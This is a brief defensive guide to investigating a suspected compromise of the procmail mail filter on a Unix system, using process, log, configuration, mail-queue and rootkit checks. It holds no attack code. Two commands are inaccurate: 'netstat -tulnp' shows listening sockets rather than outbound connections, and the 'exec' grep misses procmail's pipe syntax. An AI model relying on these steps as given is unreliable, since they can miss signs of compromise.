Procmail Attack Analysis

TL;DR

This guide helps you investigate a potential attack targeting your Unix system’s procmail process. We’ll cover identifying suspicious activity, examining logs, and cleaning up compromised configurations.

1. Identify Suspicious Activity

1. Check Running Processes: Use ps to look for unusual procmail instances or processes spawned by procmail that don’t match expected behaviour.

   ps aux | grep procmail

   Look for high CPU usage, unexpected command-line arguments, or processes running as a different user than usual.

2. Monitor System Logs: Examine /var/log/syslog (or your system’s equivalent) for errors related to procmail.

   grep -i procmail /var/log/syslog

   Pay attention to messages about failed deliveries, unexpected script executions, or permission issues.

3. Network Connections: Use netstat or ss to see if procmail is making any unusual network connections.

   netstat -tulnp | grep procmail

   Unexpected outbound connections could indicate a compromised process sending spam or exfiltrating data.

2. Examine Procmail Configuration Files

1. Locate Configuration Files: The main configuration file is typically ~/.procmailrc for each user. System-wide configurations might be in /etc/procmailrc or similar locations.
2. Review .procmailrc Contents: Carefully inspect the contents of each .procmailrc file for suspicious entries.
   • Look for unexpected forwarding addresses or scripts.
   • Check for lines that execute external commands without proper validation.
   • Be wary of complex filtering rules that might be used to hide malicious activity.
3. Identify Suspicious Scripts: If your .procmailrc file calls external scripts, examine those scripts for malicious code.

   cat ~/.procmailrc | grep -oP '(?<=exec ).*'

   This command will extract the commands being executed by procmail.

3. Investigate Mail Logs

1. Check Mail Delivery Logs: Examine your mail server's logs (e.g., Postfix, Sendmail) for messages related to the affected users.
   Look for bounced emails, delivery failures, or unusual email patterns.
2. Examine Mail Queues: Check the mail queue for stuck or suspicious messages.

   mailq

   This can reveal if an attacker is attempting to use your system as a relay.

4. Clean Up Compromised Configurations

1. Remove Suspicious Entries: Delete any malicious entries from the .procmailrc files.
   Be careful not to remove legitimate configurations accidentally. Back up the original file before making changes.
2. Replace Compromised Scripts: Replace any compromised scripts with clean versions.
   If you are unsure, delete the script entirely and reconfigure procmail without it.
3. Reset User Passwords: If a user account has been compromised, reset their password immediately.
4. Scan for Rootkits: Run a rootkit scanner to ensure that the system hasn't been further compromised.

   sudo apt-get install rkhunter # Example on Debian/Ubuntu

   Then run

   rkhunter --checkall

5. Update System: Ensure your system is fully patched with the latest security updates.

5. Further Analysis (Optional)

1. Packet Capture: If you suspect network activity, capture network traffic using tools like tcpdump or Wireshark to analyze communication patterns.

   sudo tcpdump -i eth0 port 25 # Example capturing SMTP traffic on interface eth0

2. Memory Dump: In advanced cases, you might need to perform a memory dump of the procmail process for detailed analysis. This requires specialized tools and expertise.